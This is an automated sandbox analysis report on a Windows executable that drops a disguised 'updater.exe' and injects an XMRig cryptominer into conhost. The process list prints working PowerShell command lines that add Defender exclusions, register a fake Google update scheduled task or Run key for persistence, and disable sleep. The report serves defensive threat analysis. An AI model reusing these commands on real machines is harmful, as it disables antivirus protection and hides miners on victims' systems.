Analysis
- max time kernel: 150s
- max time network: 153s
- platform: windows7_x64
- resource: win7-20230712-en
- resource tags: arch:x64, arch:x86, image:win7-20230712-en, locale:en-us, os:windows7-x64, system
- submitted: 20/07/2023, 01:49
Static task: static1
Behavioral task: behavioral1
  Sample: 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe
  Resource: win7-20230712-en
General
- Target: 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe
- Size: 2.3MB
- MD5: 95ca970b99b80e1637f0058223ef20d7
- SHA1: 15fffa0937e2fc4a5b1adfea795f0e111327e86e
- SHA256: 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5
- SHA512: e4bc541d1afee5a604150c9d63a75ed3ba9b12b4a85804d3fec88b3ca6c950aad6298a0e1af0bbd476851b712b14aaae8eac6ee037ff025aa1cd2ddc9f74adf8
- SSDEEP: 49152:2PqtTwUpl5X+V/Dwo88/YNO8cc6FCq87zgX69Im0E8O+GAH:NJDmLwo8AAxFg87zq698Vj
Malware Config
Signatures
- Suspicious use of NtCreateUserProcessOtherParentProcess (11 IoCs)
  description | pid | Process | procid_target
  PID 1832 created 1240 | 1832 | 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe | 21
  PID 1832 created 1240 | 1832 | 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe | 21
  PID 1832 created 1240 | 1832 | 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe | 21
  PID 1832 created 1240 | 1832 | 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe | 21
  PID 2800 created 1240 | 2800 | updater.exe | 21
  PID 2800 created 1240 | 2800 | updater.exe | 21
  PID 2800 created 1240 | 2800 | updater.exe | 21
  PID 2800 created 1240 | 2800 | updater.exe | 21
  PID 2800 created 1240 | 2800 | updater.exe | 21
  PID 1968 created 1240 | 1968 | conhost.exe | 21
  PID 2800 created 1240 | 2800 | updater.exe | 21
- XMRig Miner payload (14 IoCs)
  resource | yara_rule
  behavioral1/memory/2264-122-0x0000000140000000-0x00000001407F4000-memory.dmp | xmrig
  behavioral1/memory/2264-125-0x0000000140000000-0x00000001407F4000-memory.dmp | xmrig
  behavioral1/memory/2264-126-0x0000000140000000-0x00000001407F4000-memory.dmp | xmrig
  behavioral1/memory/2264-129-0x0000000140000000-0x00000001407F4000-memory.dmp | xmrig
  behavioral1/memory/2264-131-0x0000000140000000-0x00000001407F4000-memory.dmp | xmrig
  behavioral1/memory/2264-133-0x0000000140000000-0x00000001407F4000-memory.dmp | xmrig
  behavioral1/memory/2264-135-0x0000000140000000-0x00000001407F4000-memory.dmp | xmrig
  behavioral1/memory/2264-137-0x0000000140000000-0x00000001407F4000-memory.dmp | xmrig
  behavioral1/memory/2264-139-0x0000000140000000-0x00000001407F4000-memory.dmp | xmrig
  behavioral1/memory/2264-141-0x0000000140000000-0x00000001407F4000-memory.dmp | xmrig
  behavioral1/memory/2264-143-0x0000000140000000-0x00000001407F4000-memory.dmp | xmrig
  behavioral1/memory/2264-145-0x0000000140000000-0x00000001407F4000-memory.dmp | xmrig
  behavioral1/memory/2264-147-0x0000000140000000-0x00000001407F4000-memory.dmp | xmrig
  behavioral1/memory/2264-149-0x0000000140000000-0x00000001407F4000-memory.dmp | xmrig
- Executes dropped EXE (1 IoCs)
  pid | Process
  2800 | updater.exe
- Loads dropped DLL (1 IoCs)
  pid | Process
  2680 | taskeng.exe
  resource | yara_rule
  behavioral1/memory/2264-122-0x0000000140000000-0x00000001407F4000-memory.dmp | upx
  behavioral1/memory/2264-125-0x0000000140000000-0x00000001407F4000-memory.dmp | upx
  behavioral1/memory/2264-126-0x0000000140000000-0x00000001407F4000-memory.dmp | upx
  behavioral1/memory/2264-129-0x0000000140000000-0x00000001407F4000-memory.dmp | upx
  behavioral1/memory/2264-131-0x0000000140000000-0x00000001407F4000-memory.dmp | upx
  behavioral1/memory/2264-133-0x0000000140000000-0x00000001407F4000-memory.dmp | upx
  behavioral1/memory/2264-135-0x0000000140000000-0x00000001407F4000-memory.dmp | upx
  behavioral1/memory/2264-137-0x0000000140000000-0x00000001407F4000-memory.dmp | upx
  behavioral1/memory/2264-139-0x0000000140000000-0x00000001407F4000-memory.dmp | upx
  behavioral1/memory/2264-141-0x0000000140000000-0x00000001407F4000-memory.dmp | upx
  behavioral1/memory/2264-143-0x0000000140000000-0x00000001407F4000-memory.dmp | upx
  behavioral1/memory/2264-145-0x0000000140000000-0x00000001407F4000-memory.dmp | upx
  behavioral1/memory/2264-147-0x0000000140000000-0x00000001407F4000-memory.dmp | upx
  behavioral1/memory/2264-149-0x0000000140000000-0x00000001407F4000-memory.dmp | upx
- Drops file in System32 directory (5 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid | Process
  1832 | 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe
  2800 | updater.exe
- Suspicious use of SetThreadContext (2 IoCs)
  description | pid | Process | procid_target
  PID 2800 set thread context of 1968 | 2800 | updater.exe | 55
  PID 2800 set thread context of 2264 | 2800 | updater.exe | 64
- Drops file in Program Files directory (4 IoCs)
  description | ioc | Process
  File created | C:\Program Files\Google\Libs\WR64.sys | updater.exe
  File created | C:\Program Files\Google\Libs\g.log | cmd.exe
  File created | C:\Program Files\Google\Libs\g.log | cmd.exe
  File created | C:\Program Files\Google\Chrome\updater.exe | 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe
- Creates scheduled task(s) (1 TTPs, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | Process
  2960 | schtasks.exe
  1732 | schtasks.exe
- Detects videocard installed (1 TTPs, 1 IoCs)
  Uses WMIC.exe to determine videocard installed.
  pid | Process
  2884 | WMIC.exe
- Modifies data under HKEY_USERS (3 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.exe
  Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 3061207facbad901 | powershell.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | WMIC.exe
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid | Process (consecutive identical rows collapsed, in original order)
  1832 | 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe (x2)
  2544 | powershell.exe
  1832 | 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe (x4)
  2436 | powershell.exe
  1832 | 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe (x2)
  2840 | powershell.exe
  2800 | updater.exe (x2)
  520 | powershell.exe
  2800 | updater.exe (x4)
  1644 | powershell.exe
  2800 | updater.exe (x4)
  1968 | conhost.exe (x2)
  2800 | updater.exe (x2)
  2264 | conhost.exe (x37)
- Suspicious behavior: LoadsDriver (1 IoCs)
  pid | Process
  468 | Process not Found
- Suspicious use of AdjustPrivilegeToken (38 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 2544 | powershell.exe
  Token: SeShutdownPrivilege | 2420 | powercfg.exe
  Token: SeShutdownPrivilege | 2824 | powercfg.exe
  Token: SeShutdownPrivilege | 2952 | powercfg.exe
  Token: SeDebugPrivilege | 2436 | powershell.exe
  Token: SeShutdownPrivilege | 2804 | powercfg.exe
  Token: SeDebugPrivilege | 2840 | powershell.exe
  Token: SeDebugPrivilege | 520 | powershell.exe
  Token: SeShutdownPrivilege | 3048 | powercfg.exe
  Token: SeShutdownPrivilege | 2984 | powercfg.exe
  Token: SeShutdownPrivilege | 2864 | powercfg.exe
  Token: SeDebugPrivilege | 1644 | powershell.exe
  Token: SeShutdownPrivilege | 2904 | powercfg.exe
  Token: SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege, SeManageVolumePrivilege | 2884 | WMIC.exe (this set of 12 tokens is listed twice in the original, 24 rows)
  Token: SeLockMemoryPrivilege | 2264 | conhost.exe
- Suspicious use of WriteProcessMemory (41 IoCs)
  description | pid | Process | procid_target (each row listed once; the original repeats most rows three times)
  PID 2860 wrote to memory of 2420 | 2860 | cmd.exe | 34 (x3)
  PID 2860 wrote to memory of 2824 | 2860 | cmd.exe | 35 (x3)
  PID 2860 wrote to memory of 2952 | 2860 | cmd.exe | 36 (x3)
  PID 2860 wrote to memory of 2804 | 2860 | cmd.exe | 37 (x3)
  PID 2436 wrote to memory of 2960 | 2436 | powershell.exe | 38 (x3)
  PID 2840 wrote to memory of 2004 | 2840 | powershell.exe | 41 (x3)
  PID 2680 wrote to memory of 2800 | 2680 | taskeng.exe | 43 (x3)
  PID 1472 wrote to memory of 3048 | 1472 | cmd.exe | 50 (x3)
  PID 1472 wrote to memory of 2984 | 1472 | cmd.exe | 51 (x3)
  PID 1472 wrote to memory of 2864 | 1472 | cmd.exe | 52 (x3)
  PID 1644 wrote to memory of 1732 | 1644 | powershell.exe | 53 (x3)
  PID 1472 wrote to memory of 2904 | 1472 | cmd.exe | 54 (x3)
  PID 2800 wrote to memory of 1968 | 2800 | updater.exe | 55 (x1)
  PID 1976 wrote to memory of 2884 | 1976 | cmd.exe | 60 (x3)
  PID 2800 wrote to memory of 2264 | 2800 | updater.exe | 64 (x1)
- Uses Task Scheduler COM API (1 TTPs)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
- C:\Windows\Explorer.EXE (PID 1240)
  Command line: C:\Windows\Explorer.EXE
  - C:\Users\Admin\AppData\Local\Temp\5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe (PID 1832)
    Command line: "C:\Users\Admin\AppData\Local\Temp\5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe"
    Signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Suspicious use of NtSetInformationThreadHideFromDebugger; Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2544)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    Signatures: Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2436)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wtqefibev#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
    Signatures: Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\schtasks.exe (PID 2960)
      Command line: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
      Signatures: Creates scheduled task(s)
  - C:\Windows\System32\cmd.exe (PID 2860)
    Command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\System32\powercfg.exe (PID 2420)
      Command line: powercfg /x -hibernate-timeout-ac 0
      Signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\powercfg.exe (PID 2824)
      Command line: powercfg /x -hibernate-timeout-dc 0
      Signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\powercfg.exe (PID 2952)
      Command line: powercfg /x -standby-timeout-ac 0
      Signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\powercfg.exe (PID 2804)
      Command line: powercfg /x -standby-timeout-dc 0
      Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2840)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#eivudnbn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
    Signatures: Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\schtasks.exe (PID 2004)
      Command line: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 520)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    Signatures: Drops file in System32 directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\cmd.exe (PID 1472)
    Command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\System32\powercfg.exe (PID 3048)
      Command line: powercfg /x -hibernate-timeout-ac 0
      Signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\powercfg.exe (PID 2984)
      Command line: powercfg /x -hibernate-timeout-dc 0
      Signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\powercfg.exe (PID 2864)
      Command line: powercfg /x -standby-timeout-ac 0
      Signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\powercfg.exe (PID 2904)
      Command line: powercfg /x -standby-timeout-dc 0
      Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1644)
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wtqefibev#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
    Signatures: Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\system32\schtasks.exe (PID 1732)
      Command line: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
      Signatures: Creates scheduled task(s)
  - C:\Windows\System32\conhost.exe (PID 1968)
    Command line: C:\Windows\System32\conhost.exe mrldfcnkjtpom
    Signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Suspicious behavior: EnumeratesProcesses
  - C:\Windows\System32\cmd.exe (PID 1976)
    Command line: C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    Signatures: Drops file in Program Files directory; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\Wbem\WMIC.exe (PID 2884)
      Command line: wmic PATH Win32_VideoController GET Name, VideoProcessor
      Signatures: Detects videocard installed; Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\cmd.exe (PID 1788)
    Command line: C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    Signatures: Drops file in Program Files directory
  - C:\Windows\System32\conhost.exe (PID 2264)
    Command line: C:\Windows\System32\conhost.exe xserwfqvlxzoakxb 6E3sjfZq2rJQaxvLPmXgsK/+j3+8kDQ50juBnXtgaNA5bXl8IhyJSVhC36oZ+LR7lRivqD2W2bSOssOtPqg4HmIYu1ls2lpjcAH6qJ/SIKeKkM1SHWo+dKhkJtHeuU+yQmsnWIoUmtoW7e6Z4Dole3MZ9tZh9LFCmjgpfo3IgNPGB5P/yRBaU6wxNgZR5ApqnjpoSKIyxK0GafxBvWEzKAEE/zININMm9jsZx0QqFdVKqikZI/OJ3mwRUN8sAZywSMB0/qZvqzrUFg0MfWX3nC4UjaI8biSgyb8RqGEmL5ekF1REezN23lpYPUSUJ31ougdPmt+b+rrAhnaodpEH8eCfc/WDYSDjK5avdVO5fHKag5a2RKDTnDhBFRPD7F68F8M8XkzAY4OTONT0I9lTyUhnVIqeRPED30OBUm+mK1PQs5L1bor5jPTRjTi1cXuqE2dHZxMDzbglHSZmkVVFrmWrzDT4ZpnFwgMjjKERI4A=
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\taskeng.exe (PID 2680)
  Command line: taskeng.exe {3072B7AE-9B04-46B6-957D-E308274CF491} S-1-5-18:NT AUTHORITY\System:Service:
  Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
  - C:\Program Files\Google\Chrome\updater.exe (PID 2800)
    Command line: "C:\Program Files\Google\Chrome\updater.exe"
    Signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Executes dropped EXE; Suspicious use of NtSetInformationThreadHideFromDebugger; Suspicious use of SetThreadContext; Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 2.3MB
  MD5: 95ca970b99b80e1637f0058223ef20d7
  SHA1: 15fffa0937e2fc4a5b1adfea795f0e111327e86e
  SHA256: 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5
  SHA512: e4bc541d1afee5a604150c9d63a75ed3ba9b12b4a85804d3fec88b3ca6c950aad6298a0e1af0bbd476851b712b14aaae8eac6ee037ff025aa1cd2ddc9f74adf8
- Filesize: 2.3MB
  MD5: 95ca970b99b80e1637f0058223ef20d7
  SHA1: 15fffa0937e2fc4a5b1adfea795f0e111327e86e
  SHA256: 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5
  SHA512: e4bc541d1afee5a604150c9d63a75ed3ba9b12b4a85804d3fec88b3ca6c950aad6298a0e1af0bbd476851b712b14aaae8eac6ee037ff025aa1cd2ddc9f74adf8
- Filesize: 198B
  MD5: 37dd19b2be4fa7635ad6a2f3238c4af1
  SHA1: e5b2c034636b434faee84e82e3bce3a3d3561943
  SHA256: 8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
  SHA512: 86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 3711935800dead2cd6c78c03f9068f85
  SHA1: 6a1b8e5def76ca7a05be306680363c1610c798ec
  SHA256: 9ad468baa440de74d0939bb7b923347e517a6b59e5644fe99c10830da953f00a
  SHA512: c541910cc3e8a223b5f26f7bd4916c4a7f85c367f1b0f5c2adb67f3daa44decff7a200325a07c3ac844c8618bb2973c8cf7f59262922d1291be8b09eb0e07125
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 3711935800dead2cd6c78c03f9068f85
  SHA1: 6a1b8e5def76ca7a05be306680363c1610c798ec
  SHA256: 9ad468baa440de74d0939bb7b923347e517a6b59e5644fe99c10830da953f00a
  SHA512: c541910cc3e8a223b5f26f7bd4916c4a7f85c367f1b0f5c2adb67f3daa44decff7a200325a07c3ac844c8618bb2973c8cf7f59262922d1291be8b09eb0e07125
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y3W1PPQC4CHJX1XXNYBI.temp
  Filesize: 7KB
  MD5: 3711935800dead2cd6c78c03f9068f85
  SHA1: 6a1b8e5def76ca7a05be306680363c1610c798ec
  SHA256: 9ad468baa440de74d0939bb7b923347e517a6b59e5644fe99c10830da953f00a
  SHA512: c541910cc3e8a223b5f26f7bd4916c4a7f85c367f1b0f5c2adb67f3daa44decff7a200325a07c3ac844c8618bb2973c8cf7f59262922d1291be8b09eb0e07125
- Filesize: 2.3MB
  MD5: 95ca970b99b80e1637f0058223ef20d7
  SHA1: 15fffa0937e2fc4a5b1adfea795f0e111327e86e
  SHA256: 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5
  SHA512: e4bc541d1afee5a604150c9d63a75ed3ba9b12b4a85804d3fec88b3ca6c950aad6298a0e1af0bbd476851b712b14aaae8eac6ee037ff025aa1cd2ddc9f74adf8